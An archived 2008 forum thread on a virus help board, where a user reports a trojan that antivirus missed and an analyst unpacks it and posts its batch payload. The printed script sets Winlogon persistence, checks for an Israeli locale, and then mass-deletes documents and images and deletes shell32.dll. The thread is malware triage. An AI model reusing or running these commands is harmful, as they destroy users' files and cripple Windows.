PDA

Просмотр полной версии : New Trojan / Not detectable by any antivirus/rookit/anti-spyware



adis
14.05.2008, 22:09
Hello everybody,

I have discovered by chance a few processes running from a TMP file/VBS script.

I copy and paste the VBS script. I do not know what this Trojan is doing, but when I deleted the files and rebooted, my keyboard and mouse didnt work! I have tried several antivirus, antiroot kits and anti spyware which didnt work.
moderated::: file attached as VBS.txt

Muffler
14.05.2008, 22:21
Hi,
adis, can you send us a copy of this file?

Looks like this is a part of Worm.Win32.AutoRun...

adis
15.05.2008, 00:13
I have put the vbs script and the explot.exe renamed in explot-root.exe here:

http://www.speedyshare.com/521433131.html

Muffler
15.05.2008, 08:00
Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
Unpacked file contains .bat file which I think explains everything:


@echo off..title....reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\sy stem32\taskfile.exe /f....reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"..reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"..find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit..find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit....del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm..del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm..del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm..del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm..del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm..del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm..del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm..del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm....del /f %systemroot%\system32\shell32.dll..del /f %systemdrive%\svi*...

adis
15.05.2008, 09:34
Thanks! Any idea how to cure this?

It seems it was supposed to delete me all documents and pcitures on the system. And, at the end, it was deleting itself and shell32? Do you think shell32 and tasklist are infected as well?

I have avast home edition running as antivirus on my system. It did not detect anything! Trying to cure with others didnt work either!

cheers
Adrian

Rene-gad
15.05.2008, 09:50
Thanks! Any idea how to cure this?pls. read the rules http://virusinfo.info/showthread.php?t=9184 :rtfm: